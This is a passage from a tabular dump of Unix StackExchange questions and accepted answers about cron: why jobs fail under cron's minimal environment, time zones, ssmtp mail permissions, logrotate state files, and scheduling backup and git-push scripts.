date int64 1,220B 1,719B | question_description stringlengths 28 29.9k | accepted_answer stringlengths 12 26.4k | question_title stringlengths 14 159 |
|---|---|---|---|
1,370,511,561,000 |
I have various backup-style scripts which run from cron on a headless server (Ubuntu 14.04), typically on a daily schedule. Cron is configured with a mail server so I get feedback from jobs. Normally these backup scripts are written to run without any stdout/stderr output on success (following the standard Unix paradigm that "no news is good news"), so that they don't clog up my email inbox with lots of junk.
From time to time these fail, and I will get a mail immediately with the stdout/stderr output. However, often these failures are for known reasons, and in particular are transient (i.e. they will likely go away again the next day). For example, my internet connection is a little unreliable, and occasionally remote DNS resolutions will fail (assume that's unfixable for the purposes of this question). Of course, that can't be predicted in advance, so reducing the frequency of the job doesn't work.
What I think I would like is for cron to report back to me only after a particular job has failed more than n times, or for longer than a certain period, so that I get reports only of 'permanent' errors that I need to address. Is that possible?
I am using cron 3.0pl1-124ubuntu2 on Ubuntu 14.04, although I'm open to other cron-like software and a more general answer (e.g. a wrapper I can place around my scripts) would be very useful to others, I'm sure.
Options I have considered:
Incorporate logic into the script itself to handle this - an option, but I was looking for something a bit more generic - some scripts are bash, some Python, etc. Also, this would significantly complicate things, as all the stdout/stderr the script produced would likely need to sit in a wrapper function.
Use a Continuous Integration server like Jenkins to handle running my jobs - more powerful, probably provides what I'm looking for with various plugins, but significantly more complex to manage, a bit heavyweight (requires a JVM), and not very Unix-y.
noexcuses - A bit too aggressive, since it would retry remote backups, etc., which would tie up resources and potentially cause accidental DoSes. I'd rather the cron job were retried on its original schedule.
|
I have now begun to write a wrapper utility to solve my own problem here, called cromer. It is now working in a basic form. Any contributions/pull requests/issues etc. welcome.
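A minimal sketch of the idea in bash (not cromer itself — the function name, state-file location, and threshold handling are all illustrative assumptions): count consecutive failures in a state file and only release the job's output, along with a failing exit status, once the threshold is reached, so cron's mail stays quiet for transient errors.

```shell
#!/bin/bash
# suppress_transient THRESHOLD COMMAND [ARGS...]
# Run COMMAND; stay silent (exit 0) until it has failed THRESHOLD
# times in a row. A success resets the counter.
suppress_transient() {
    local threshold=$1; shift
    local state="/tmp/suppress-$(basename "$1").count"
    local out status count
    out=$("$@" 2>&1) && status=0 || status=$?
    if [ "$status" -eq 0 ]; then
        rm -f "$state"                      # success: reset the counter
        return 0
    fi
    count=$(( $(cat "$state" 2>/dev/null || echo 0) + 1 ))
    echo "$count" > "$state"
    if [ "$count" -ge "$threshold" ]; then
        printf '%s\n' "$out"                # now let cron mail the output
        return "$status"
    fi
    return 0                                # transient failure: stay silent
}
```

A cron entry would then wrap the job, e.g. `0 3 * * * suppress-transient 3 /usr/local/bin/backup-job`, assuming the function is saved as an executable script of that (hypothetical) name.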
| How can I ignore transient failures in scripts run by cron? |
1,370,511,561,000 |
I'm running crontab on Ubuntu 14.04, on DigitalOcean's VPS service.
I've made a web scraper to do a job every two hours.
My issue is that cron disregards the hours I've set and follows only the minute instruction.
Here is my cron line
30 8,10,12,14,16 * * * /usr/bin/python /path/to/myscript.py
Instead of running this job at 8.30am, 10.30am, etc., it ran at 11.30pm tonight. I changed the minutes to 37 and it ran again at 11.37pm.
Before running cron I changed the TZ to my time (Sydney), and when I'm logged into the VPS via the terminal, date returns my local time.
Any ideas what's going wrong?
|
Just to save the answer from the comments:
The problem turned out to be that cron had started under one TZ value; the TZ was later changed (affecting future processes), but cron jobs did not run at the correct time until cron itself was restarted with the new TZ.
| Cron not keeping to specified time |
1,370,511,561,000 |
I wrote a script to check for a wifi connection that has an "if then else" statement. If I run the script manually, the "if" condition evaluates to 1 (true), as it should; if crontab runs it automatically, the condition evaluates to 0 and the script runs the else commands. Can anyone think of a reason for it to yield different results?
The script "if" condition is:
if ifconfig wlan0 | grep -q "inet addr:" ; then
|
The ifconfig binary resides in /sbin, which by default is not on the cron path. Use full paths to the commands:
if /sbin/ifconfig wlan0 | /bin/grep -q "inet addr:" ; then
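As an alternative sketch (the script path below is a hypothetical example), you can instead extend PATH at the top of the crontab so every entry finds /sbin binaries without hard-coding paths:

```shell
# Top of the crontab (crontab -e): make /sbin and /usr/sbin visible
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow command
*/5 * * * * /home/pi/check-wifi.sh   # hypothetical script calling ifconfig/grep
```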
| crontab versus manual running script |
1,370,511,561,000 |
I have a script that checks to see if port 4000 is open and listening, if it is return true, else start a service that also outputs a logfile. The script runs fine if I execute it as a user, but if I add it as a cron it doesn't run. I'm logged in as root, the script is owned by root, the script has executable permissions, and I am running crontab -e as root.
#!/bin/bash
if lsof -Pi :4000 -sTCP:LISTEN -t >/dev/null ; then
return 1
else
seoserver -p 4000 start > /var/www/vhosts/domain.com/httpdocs/seoserver.log &
fi
And here is my cron
*/5 * * * * /usr/bin/seoStart
|
Cron doesn't start with common environment variables that your user has, including $PATH.
You have the full path in your cron, which is good, but you need to add it to your script as well.
which lsof
and
which seoserver
will give you the full path. Modify your script to use that instead of lsof and seoserver.
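A small illustrative demo of the underlying failure mode — command lookup depends entirely on PATH, so the same command "exists" or "doesn't exist" depending on the environment cron provides:

```shell
#!/bin/bash
# Look up a common command under the normal PATH, then under a broken one.
found=$(sh -c 'command -v ls')                              # found via PATH
missing=$(PATH=/nonexistent sh -c 'command -v ls' || true)  # lookup fails
echo "with normal PATH: $found"
echo "with broken PATH: ${missing:-<not found>}"
```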
| Why scripts run as user but not as a cron? |
1,370,511,561,000 |
I tried to set up wallpaper change via cron in /etc/crontab, but I failed.
DISPLAY env set directly / before cmd, but still it's not working:
DISPLAY=:0.0
* * * * * ad env DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/
* * * * * ad DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/
* * * * * ad export DISPLAY=:0.0; /usr/bin/awsetbg -a -r /home/ad/img/beauty/
su - user -c "cmd" worked:
* * * * * root su - ad -c "DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/"
Now I'm using user's crontab (crontab -e) which works fine:
*/10 * * * * DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/
What else do I have to set?
cron's env:
MAILTO=root
SHELL=/bin/bash
USER=ad
PATH=/sbin:/bin:/usr/sbin:/usr/bin
PWD=/
SHLVL=1
HOME=/
LOGNAME=ad
DISPLAY=:0.0 # same result for DISPLAY=:0
_=/bin/env
Using vixie-cron 4.1-r1 on Gentoo.
|
My guess is that the fix is changing HOME=/ to HOME=/home/ad.
| Changing user's wallpaper via system crontab |
1,370,511,561,000 |
I have a Makefile which I run regularly via crontab every day at 02:30:
crontab -e; 30 2 * * * /bin/thePseudocode
Python-like Pseudocode
directories = ["Cardiology", "Rheumatology", "Surgery"]
for directory in directories
files = directory.files(); % not sure if such a parameter exists
files = files.match(.*tex); % trying to get only tex files; not sure if match exists
summaryFile = "";
for texFile in files
summaryFile.add( ...
textFile.match( (?s)\\begin{question}.*?\\end{question} ) ...
)
% Solution based on this thread
% Problem in writing this Regex in Perl http://unix.stackexchange.com/questions/159307/to-match-only-innermost-environment-by-regex
end
end
save this `summaryFile` as /Users/Masi/Dropbox/QuestionSummary.tex
where files is the list of all files in the directory, and summaryFile is the file which lists all questions in all tex-files.
Finally, I want to compile those files with pdflatex and read them each morning in a PDF reader.
Example file, which is located in the folder Rheumatology:
\section{Takayasu arteritis}
\begin{question}
{You get a patient.
What do you notice first in this patient?}
Absence of peripheral pulse.
\end{question}
\begin{question}
{What was the first Takayasu case?}
Young woman in Asia with red vessels in the eye.
So special eye diagnosis done.
Affects eye.
\end{question}
Fever of unknown origin can be used when you do not know what is causing the disease.
% Show cases in MedScape and ask class.
Aneurysms.
\subsection{Treatment}
\begin{question}
{What you should always include in Takayasu treatment?
What are the symptoms?}
Blood pressure.
Aneurysms which will burst without treatment.
So blood pressure decreasing drugs like beta blockers along in combination with other drugs.
\end{question}
\begin{question}
{When is the checkup of the Takayasu arteritis?}
Only once per year.
You could expect every month like normally in this kind of diseases.
But only once per year.
\end{question}
where the output for all files in the folder should be:
\section{Rheumatology}
\begin{question}
{You get a patient.
What do you notice first in this patient?}
Absence of peripheral pulse.
\end{question}
\begin{question}
{What was the first Takayasu case?}
Young woman in Asia with red vessels in the eye.
So special eye diagnosis done.
Affects eye.
\end{question}
\begin{question}
{What you should always include in Takayasu treatment?
What are the symptoms?}
Blood pressure.
Aneurysms which will burst without treatment.
So blood pressure decreasing drugs like beta blockers along in combination with other drugs.
\end{question}
\begin{question}
{When is the checkup of the Takayasu arteritis?}
Only once per year.
You could expect every month like normally in this kind of diseases.
But only once per year.
\end{question}
Makefile
all:
pdflatex /Users/Masi/Dropbox/QuestionsSummary.tex /Users/Masi/Dropbox/QuestionsSummary.pdf
pdflatex /Users/Masi/Dropbox/QuestionsSummary.tex /Users/Masi/Dropbox/QuestionsSummary.pdf % to compile a few times to be successful
pdflatex
% I am not sure if I should have some error management, since pdflatex often crashes
% So pdflatex is probably not the right tool to use
How would you implement such pseudocode with whatever tools you prefer?
I like Python, but I would not want to do everything with it.
|
If I understand correctly, you're looking for something like this (in bash):
#!/usr/bin/env bash
## avoid errors if a directory has no *tex files
shopt -s nullglob
directories=("Cardiology" "Rheumatology" "Surgery");
## Change this to set whichever options you want.
printf "%s\n%s\n" "\documentclass{YOURCLASS}" "\begin{document}"
for directory in "${directories[@]}"
do
## Reset the counter, avoid empty sections.
c=0;
for file in "$directory"/*tex
do
let c++
[ "$c" -eq 1 ] && printf "\n%s\n" "\section{$directory}"
## Extract the wanted lines
perl -lne '$a=1 && print "" if /\\begin{question}/;
print if $a==1;
$a=0 if /\\end{question}/;' "$file"
echo ""
done
done
echo "\end{document}"
If you run that script from the directory that contains Cardiology etc, it should provide output like this:
| To write this Pseudocode with Regex |
1,370,511,561,000 |
crontab -e
0 */4 * * * root /usr/bin/rsnapshot hourly
30 3 * * * root /usr/bin/rsnapshot daily
0 3 * * 1 root /usr/bin/rsnapshot weekly
30 2 1 * * root /usr/bin/rsnapshot monthly
tail /var/log/cron
Jun 13 21:01:01 web-backups run-parts(/etc/cron.hourly)[2795]: starting 0anacron
Jun 13 21:01:01 web-backups run-parts(/etc/cron.hourly)[2806]: finished 0anacron
Jun 13 22:01:01 web-backups CROND[2810]: (root) CMD (run-parts /etc/cron.hourly)
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2810]: starting 0anacron
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2819]: finished 0anacron
Jun 13 22:01:01 web-backups CROND[2822]: (root) CMD (run-parts /etc/cron.hourly)
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2822]: starting 0anacron
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2831]: finished 0anacron
Jun 13 22:44:59 web-backups crontab[2854]: (root) BEGIN EDIT (root)
Jun 13 22:45:07 web-backups crontab[2854]: (root) END EDIT (root)
But I am not seeing my cronjobs run.
I can run the tasks manually and they run fine.
|
The format you are using for your crontab is the /etc/cron.d format. When using crontab -e to edit the crontab, the username is not specified. The user used to run the job is the user that ran crontab -e.
Basically, change to this:
0 */4 * * * /usr/bin/rsnapshot hourly
30 3 * * * /usr/bin/rsnapshot daily
0 3 * * 1 /usr/bin/rsnapshot weekly
30 2 1 * * /usr/bin/rsnapshot monthly
| Crontab does not run? |
1,370,511,561,000 |
I've experienced an issue where some of my scripts run perfectly fine when I call them manually, but the same scripts don't seem to work at all when run as cron jobs.
So my question: are there restrictions on the commands and/or scripts (and their execution privileges) that can be used in a script scheduled to run with cron?
|
The most common reason commands that work fine from the command line fail under cron is that cron jobs run in a stripped-down environment with only a handful of variables defined.
In particular, PATH is set to its default value.
Any customization done in dot files (.profile, /etc/profile and the like) is not applied to cron scripts, but of course this can be fixed by modifying the cron entry or the called script itself.
The fact that the script is non-interactive and lacks a graphical environment (no DISPLAY variable) may also prevent scripts from running as expected.
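Two common fixes, sketched with hypothetical paths — either give cron a fuller PATH or source the profile inside the entry:

```shell
# Alternative A: define PATH at the top of the crontab
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Alternative B: source the user's profile in the entry itself
* * * * * . "$HOME"/.profile; /path/to/script.sh
```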
| Does cron impose some limitations to types of commands and privilege of execution? [duplicate] |
1,369,877,415,000 |
I have a backup script which is run daily by Anacron. It can take around 3 hours to complete.
I'm happy for Anacron not to commence the script if the laptop is running on batteries, but once started, I don't want it to be terminated if battery mode commences, since doing so leaves me with an incomplete backup and a false sense of security. The backup uses rsnapshot, which rotates the backups.
How can I disable Anacron's monitoring of power mode for running jobs (or otherwise work around this behaviour)?
I'm running Kubuntu 12.04.2.
|
Found this blog post titled: Linux: Anacron tips, which describes how to block anacron from getting killed when the power state is on battery:
excerpt from blog post
IMPORTANT: If you are using anacron on a laptop, anacron will stop (get killed) when running on battery, and your scripts will not get executed. This is the default behavior, to save battery.
To change this do the following:
sudo gedit /usr/lib/pm-utils/power.d/anacron
and change to:
case $1 in
false)
start -q anacron || :
;;
true)
start -q anacron || :
;;
esac
| How to prevent the termination of Anacron jobs after battery mode commences? |
1,369,877,415,000 |
I want to be able to push a repository to Github at midnight, every night. I know that Github isn't a back-up service, and, in no way am I expecting it to be this - I just want the best up-to-date version on Github and this works for me, and, my team. What I was thinking is this:
Creating a Bash script that pushes the repository to Github normally
In Crontab, execute the script at midnight every day of the week.
Would this be the best method to use? If so, this seems easy enough to do.
My next problem :) I want an email to be sent to me, after the repository has been pushed, so it would just send an email saying: "Repository Pushed.. Ok" or if there was a problem, it would alert me to this. Is this possible? If so, could anyone please provide some examples of how to do this.
Hope someone can help :)
|
As described in the links from harish.venkat:
Create a script /path_to_script, which would add new file, commit and push.
#!/bin/bash
cd /location/of/clone || exit 1
git add *
if [[ $? != 0 ]]; then
    mail -s "add failed" [email protected]
    exit 1
fi
git commit -a -m "commit message, to avoid being prompted interactively"
if [[ $? != 0 ]]; then
    mail -s "commit failed" [email protected]
    exit 1
fi
git push
if [[ $? != 0 ]]; then
    mail -s "push failed" [email protected]
    exit 1
fi
mail -s "push ok" [email protected]
Make the script executable:
chmod a+x /path_to_script
Use crontab -e and add the line below:
# run every night at 03:00
0 3 * * * /path_to_script
| Crontab with Github |
1,369,877,415,000 |
I'm trying to use cron for the first time, and I'm stuck.
I'm using Ubuntu 10.10, and the following is my /etc/crontab file. The only modification that I've made is appending the last line.
I've verified that cron is running, and the other jobs here run, but the last one does not.
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
21 22 * * * root /etc/mycron/myscript.sh > /home/me/stuff/log/cron.log
I've checked $ sudo grep CRON /var/log/syslog and found evidence of the hourly jobs, but nothing for the new job.
I've looked for cron.allow and cron.deny files, but they don't seem to exist on my machine.
|
I hate to ask the obvious, but is /etc/mycron/myscript.sh executable? You can check with:
ls -l /etc/mycron/myscript.sh
You should generally see three x's. If not, try:
chmod -v +x /etc/mycron/myscript.sh
You can also use sh or bash to run the script, using this line in the cron instead:
sh /etc/mycron/myscript.sh
| Cron job not executing |
1,369,877,415,000 |
I need to create and install my cron file with:
cat cronfile1 cronfile2 > cronfile
crontab cronfile -u myuser
This works for me, but I want to know if I can do directly
cat cronfile1 cronfile2 > /var/spool/cron/crontabs/myuser
Of course I am root, and I'm doing this from busybox. Is it safe or am I doing something wrong and should use the crontab command instead?
|
You should use the crontab command so that the daemon is notified of the change and you can be warned about parse errors. It is not advisable to write the file manually.
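For example, the same flow through crontab(1) — a sketch; a vixie-style crontab validates the file before installing, though busybox's implementation may be more lenient:

```shell
cat cronfile1 cronfile2 > cronfile
crontab -u myuser cronfile   # refuses to install a file with syntax errors
crontab -l -u myuser         # confirm what the daemon will actually use
```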
| Can I bypass crontab command by putting the file? |
1,369,877,415,000 |
I'm trying to zip a directory and copy it over as a backup. I'm new to Linux to so I followed guides as best as I could, but when trying
systemctl status cron
I get the following error:
Apr 27 13:34:01 mc-server cron[950]: Error: bad username; while reading /etc/crontab
Running the command standalone works as expected (the 3 minute timer was only for testing purposes).
This is the full crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root zip -r -q /mnt/truenas/Ozone/Backup_$(TZ="Europe/Berlin" date "+%A_%d.%m.%y_%H;%M").zip /home/rexor/mcserver
#
|
From man 5 crontab:
The ``sixth'' field (the rest of the line) specifies the command to be run. The entire command portion of the line, up to a newline or % character, will be executed by /bin/sh or by the shell specified in the SHELL variable of the crontab file. Percent-signs (%) in the command, unless escaped with backslash (\), will be changed into newline characters, and all data after the first % will be sent to the command as standard input. There is no way to split a single command line onto multiple lines, like the shell's trailing "\".
I'm not sure why this causes the mentioned error, but try escaping the '%' characters in your command and see if it helps:
*/3 * * * * root zip -r -q /mnt/truenas/Ozone/Backup_$(TZ="Europe/Berlin" date "+\%A_\%d.\%m.\%y_\%H;\%M").zip /home/rexor/mcserver
| Why is my crontab giving me a bad username error? |
1,369,877,415,000 |
We are trying to schedule a script to run at 9am ET every day throughout the year, regardless of daylight savings. On our GCP Compute Engine / Linux Server, cron runs in UTC always. It is easy enough to adjust -4 or -5 hours to run in ET, however the issue of daylight savings is (mildly) problematic, as we have to change the cron time by +/- 1 hour at daylight savings for it to remain at 9am ET.
In R, rather than using EDT, we can set the timezone environment to America/New_York, which seems to account automatically for daylight savings, always running at 9am regardless of EDT vs EST. Is there any way to schedule in cron so that something runs at 9am ET always?
|
Try setting both of these in your cron:
CRON_TZ='America/New_York'
TZ='America/New_York'
EDIT: You can put the shell script wherever you like.
On the job line, you enter the command you need executed (be it a script or whatever).
Run crontab -e and type CRON_TZ=<YOUR/TZ>.
Right below CRON_TZ, point to the location of the shell script/command you want executed.
Remember to make sure that the script is executable.
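Put together, the crontab could look like this sketch (the script path is illustrative; CRON_TZ is honored by cronie-based crons, so check your cron implementation):

```shell
CRON_TZ='America/New_York'
TZ='America/New_York'
# m h dom mon dow command — fires at 09:00 New York time year-round
0 9 * * * /path/to/daily-report.sh
```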
| Run crontab in America/New_York time zone |
1,369,877,415,000 |
I have installed ssmtp on a Raspberry Pi running Raspbian 10 Buster. Email from the command line, e.g. using mail, works fine. However, I have also configured a user's cron job to send email by adding the MAILTO variable to the file.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
MAILTO="[email protected],[email protected]"
# we need to set the user path to add the system scripts directory /usr/local/sbin
# I tried with PATH=$PATH:/usr/local/sbin but it used this verbatim in the path
PATH=/usr/sbin:/usr/bin:/bin:/usr/local/sbin:
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
26 3 * * * cronic python3 ~/redacted_directory_name/redacted_script_name.py
24 22 * * * echo "Testing cron email"
As I understand from other online searches (correct me if I'm wrong), cron uses sendmail by default to send emails.
Sendmail is available on the system, but it is really ssmtp
$ which sendmail
/usr/sbin/sendmail
$ ls -l /usr/sbin/sendmail
lrwxrwxrwx 1 root root 5 Jul 20 2014 /usr/sbin/sendmail -> ssmtp
On this machine I have configured ssmtp to use an external SMTP server to send mail.
cron doesn't send email either for root or another non-sudo user.
In the logs for mail I see the following
$ tail /var/log/mail.log
Jan 17 16:43:02 ed-mh-pi01 sSMTP[25679]: Cannot open mailhub:25
Jan 18 03:22:24 ed-mh-pi01 sSMTP[9846]: Creating SSL connection to host
Jan 18 03:22:25 ed-mh-pi01 sSMTP[9846]: SSL connection using ECDHE_RSA_AES_256_GCM_SHA384
Jan 18 03:22:26 ed-mh-pi01 sSMTP[9846]: Sent mail for root@[email protected] (221 2.0.0 Bye) uid=0 username=root outbytes=638
Jan 18 22:20:02 ed-mh-pi01 sSMTP[6924]: /etc/ssmtp/ssmtp.conf not found
Jan 18 22:20:02 ed-mh-pi01 sSMTP[6924]: Unable to locate mailhub
Jan 18 22:20:02 ed-mh-pi01 sSMTP[6924]: Cannot open mailhub:25
Jan 18 22:24:01 ed-mh-pi01 sSMTP[6988]: /etc/ssmtp/ssmtp.conf not found
Jan 18 22:24:01 ed-mh-pi01 sSMTP[6988]: Unable to locate mailhub
Jan 18 22:24:01 ed-mh-pi01 sSMTP[6988]: Cannot open mailhub:25
The entries for Jan 18 22:20:02 and Jan 18 22:24:02 appear to be related to the cron job email. I did a couple of tests at these times.
It states that whatever process is sending the email does not have access to /etc/ssmtp/ssmtp.conf. On the Arch linux wiki it states that
The /usr/bin/ssmtp binary runs as the mail group and can read this
file. There is no reason to add yourself or other users to the mail
group.
I don't know if that is true for raspbian, but it made me think that perhaps this was the problem. I experimented with changing the group ownership of /etc/ssmtp/ and its contents to mail, like so:
$ ls -l /etc/ssmtp/
total 8
-rw-r--r-- 1 root mail 200 Jul 20 2014 revaliases
-rw-r----- 1 root mail 764 Jan 17 12:03 ssmtp.conf
However, the problem persists
[root] ~ $ tail /var/log/mail.log
<snip>
Jan 18 22:39:01 ed-mh-pi01 sSMTP[7559]: /etc/ssmtp/ssmtp.conf not found
Jan 18 22:39:01 ed-mh-pi01 sSMTP[7559]: Unable to locate mailhub
Jan 18 22:39:01 ed-mh-pi01 sSMTP[7559]: Cannot open mailhub:25
So, why is cron not sending email, and how can I fix it?
EDIT
If I change (temporarily) the permissions on /etc/ssmtp/ssmtp.conf to allow any user to read, the emails are sent. This is not a solution as this file contains the plain text password for the email account, and also doesn't explain why normal users can send from the command line, but cron cannot.
EDIT 2
$ ls -l /usr/sbin/ssmtp
-rwxr-xr-x 1 root root 30588 Jul 20 2014 /usr/sbin/ssmtp
|
You've written that,
The /usr/bin/ssmtp binary runs as the mail group and can read this file
But you have shown that this is not the case for your binary:
-rwxr-xr-x 1 root root 30588 Jul 20 2014 /usr/sbin/ssmtp
What the Wiki says is,
Because your email password is stored as cleartext in /etc/ssmtp/ssmtp.conf, it is important that this file is secure. By default, the entire /etc/ssmtp directory is accessible only by root and the mail group. The /usr/bin/ssmtp binary runs as the mail group and can read this file. There is no reason to add yourself or other users to the mail group.
So you need to correct the broken permissions:
chown -R root:mail /etc/ssmtp /usr/sbin/ssmtp
chmod -R g=u,g-w,o= /etc/ssmtp
chmod a=rx,g+s /usr/sbin/ssmtp
However I should also point out that the first thing the Arch wiki says is,
sSMTP is unmaintained. Consider using something like msmtp or OpenSMTPD instead
| Cron not sending email, command line email works |
1,369,877,415,000 |
I have an issue that probably has something to do with the PATH variable.
This is an email I got with errors about a script run from cron:
Cron Daemon <mail.org>
05:08 (15 hours ago)
to root, bcc: me
mail: Null message body; hope that's ok
tar: Fjerner indledende '/' fra medlemsnavne
mail: Null message body; hope that's ok
/home/user/bin/checkSystem: linje 16: chkrootkit: command not found
mail: Null message body; hope that's ok
/home/user/bin/checkSystem: linje 21: logwatch: command not found
/home/user/bin/checkSystem: linje 22: logwatch: command not found
/home/uesr/bin/checkSystem: linje 23: logwatch: command not found
mail: Null message body; hope that's ok
mail: Null message body; hope that's ok
mail: Null message body; hope that's ok
I just changed the owner of the script from user to root
$ls -sail /home/user/bin/checkSystem
541784 4 -rwxr-x--- 1 root root 1235 aug 23 14:05 /home/user/bin/checkSystem
crontab -e
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
0 5 * * 1 /home/user/bin/checkSystem
Here is the script:
#!/bin/bash
2 date=`date +%d-%m-%y`
3 mail="mail.org"
4
5 ## rkhunter
6 #rkhunter --update
7 rkhunter --checkall --cronjob --report-warnings-only > rkhunter-check-$date.log
8 mail -A rkhunter-check-$date.log -s "rkhunter-check" $mail < /dev/null 2>&1
9 rm rkhunter-check-$date.log
10 tar -cf rkhunter-log-$date.tar /var/log/rkhunter.log
11 gzip rkhunter-log-$date.tar
12 mail -A rkhunter-log-$date.tar.gz -s "rkhunter-log" $mail < /dev/null 2>&1
13 rm rkhunter-log*.tar.gz
14
15 ## chkrootkit
16 chkrootkit > chkrootkit-$date.log
17 mail -A chkrootkit-$date.log -s "chkrootkit" $mail < /dev/null 2>&1
18 rm chkrootkit-$date.log
19
20 ## logwatch
21 logwatch --output html --detail High --range All > logwatch-all-$date.html
22 logwatch --output html --detail High --range Today > logwatch-today-$date.html
23 logwatch --output html --detail High --range Yesterday > logwatch-yesterday-$date.html
24 mail -A logwatch-all-$date.html -s "logwatch all" $mail < /dev/null 2>&1
25 mail -A logwatch-today-$date.html -s "logwatch today" $mail < /dev/null 2>&1
26 mail -A logwatch-yesterday-$date.html -s "logwatch yesterday" $mail < /dev/null 2>&1
27 rm -f logwatch-*.html
28
29 ## testing command
30 #echo "Just testing my sendmail gmail relay" | mail -s "Sendmail gmail Relay" mail.org
What's the deal?
EDIT:
(root@host)-(20:39:01)-(/home/user)
$which logwatch
/usr/sbin/logwatch
(root@host)-(20:39:06)-(/home/user)
$which chkrootkit
/usr/sbin/chkrootkit
(root@host)-(20:39:16)-(/home/user)
$which rkhunter
/usr/bin/rkhunter
(root@host)-(20:39:22)-(/home/user)
$
|
When the cron job runs, logwatch cannot be found.
Since logwatch is installed, this probably means it's missing from cron's PATH.
You can fix this by adding /usr/sbin to a PATH= line at the top of the crontab.
Another way to fix this, if you'd rather not touch the crontab's PATH, is simply to use the full path to each executable directly in the script.
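A sketch of the first fix, with the directories taken from the `which` output in the question, placed at the top of the crontab opened with crontab -e:

```shell
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow command
0 5 * * 1 /home/user/bin/checkSystem
```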
| cron script cannot find logwatch and chkrootkit |
1,369,877,415,000 |
I know this sounds weird...
I have a project which will run "logrotate myConf.conf" automatically every hour.
Besides, in my cron/, there is also a logrotate running...
The two processes might modify the same log file.
In this case, what will happen?
Will the log file be totally screwed, or will just one of the commands fail (which would be good enough)?
|
Yes, there may be issues relating to the state file that logrotate keeps.
See my answer to a question about a corrupt state file due to concurrent runs of logrotate from cron:
/var/lib/logrotate/status gets invalid entries
The summary: be sure that your specific rotation job is either run as part of the system's ordinary rotation job, or run from a personal cron job with a separate state file (specified with the -s option to logrotate). In either case, only run the rotation from one cron job.
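A sketch of the personal-cron-job variant (path, schedule, and state-file location are all illustrative):

```shell
# Hourly rotation with a private state file, so it never races the
# system job's /var/lib/logrotate/status
0 * * * * /usr/sbin/logrotate -s /var/lib/myproject/logrotate.state /path/to/myConf.conf
```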
| what if two logrotate run concurrently |
1,369,877,415,000 |
I want a Python script to send notifications. The script runs successfully and shows what I want when run manually, but crontab does not start it correctly.
The following is the relevant code, which uses libnotify (via pynotify):
import pynotify

def SendMessage(title, message):
    pynotify.init("ChinaBank")
    notice = pynotify.Notification(title, message)
    notice.show()
    return
what I did in crontab is
* * * * * display=`/home/li/script/FetchDisplay.sh` && export DISPLAY=$display && /home/li/projects/fetch-data/EuroForex.py 2>/home/li/error
Here, FetchDisplay.sh gets the display, as follows:
#!/bin/bash
if [ "$DISPLAY" != "" ]; then
echo $DISPLAY
exit
fi
if [ "$USER" = "" ]; then
USER=`whoami`
fi
pinky -fw | awk -v user=$USER 'NF == 6 {if($1 == user) {print $6}}' | awk 'NR==1{print $0}'
the error output is
Traceback (most recent call last):
File "/home/li/projects/fetch-data/EuroForex.py", line 43, in <module>
SendMessage("Please be ready to sell", str(SellData))
File "/home/li/projects/fetch-data/EuroForex.py", line 15, in SendMessage
notice.show()
